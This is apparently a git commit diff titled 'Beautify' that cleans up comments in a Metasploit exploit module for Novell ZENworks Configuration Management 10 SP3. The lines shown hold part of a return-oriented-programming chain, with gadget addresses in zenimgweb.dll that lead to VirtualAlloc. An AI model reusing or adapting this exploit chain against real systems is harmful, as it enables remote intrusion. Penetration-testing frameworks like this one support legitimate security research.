Beautify
parent
83b7b90c61
commit
d51209a3cf
|
@ -90,11 +90,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if target.name =~ /Novell ZENworks Configuration Management 10 SP3/
|
if target.name =~ /Novell ZENworks Configuration Management 10 SP3/
|
||||||
rop_gadgets =
|
rop_gadgets =
|
||||||
[
|
[
|
||||||
0x100066b1, # POP EDX # MOV ESI,C4830005 # ADD AL,3B # RETN
|
0x100066b1, # POP EDX # MOV ESI,C4830005 # ADD AL,3B # RETN [zenimgweb.dll]
|
||||||
0x00001000, # 0x00001000-> edx
|
0x00001000, # 0x00001000-> edx
|
||||||
0x100239df, # POP ECX # RETN [zenimgweb.dll]
|
0x100239df, # POP ECX # RETN [zenimgweb.dll]
|
||||||
0x1007d158, # ptr to &VirtualAlloc() [IAT zenimgweb.dll]
|
0x1007d158, # ptr to &VirtualAlloc() [IAT zenimgweb.dll]
|
||||||
0x10018653, # MOV EAX,DWORD PTR DS:[ECX] # ADD ESP,20 # RETN ** [zenimgweb.dll]
|
0x10018653, # MOV EAX,DWORD PTR DS:[ECX] # ADD ESP,20 # RETN [zenimgweb.dll]
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
|
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
junk, # Filler (compensate)
|
junk, # Filler (compensate)
|
||||||
0x1002a38f, # PUSH EAX # POP ESI # RETN ** [zenimgweb.dll]
|
0x1002a38f, # PUSH EAX # POP ESI # RETN [zenimgweb.dll]
|
||||||
0x00423ddd, # POP EBP # RETN [novell-pbserv.exe]
|
0x00423ddd, # POP EBP # RETN [novell-pbserv.exe]
|
||||||
0x10007b22, # & push esp # ret [zenimgweb.dll]
|
0x10007b22, # & push esp # ret [zenimgweb.dll]
|
||||||
0x100235dc, # POP EBX # RETN [zenimgweb.dll]
|
0x100235dc, # POP EBX # RETN [zenimgweb.dll]
|
||||||
|
|
Loading…
Reference in New Issue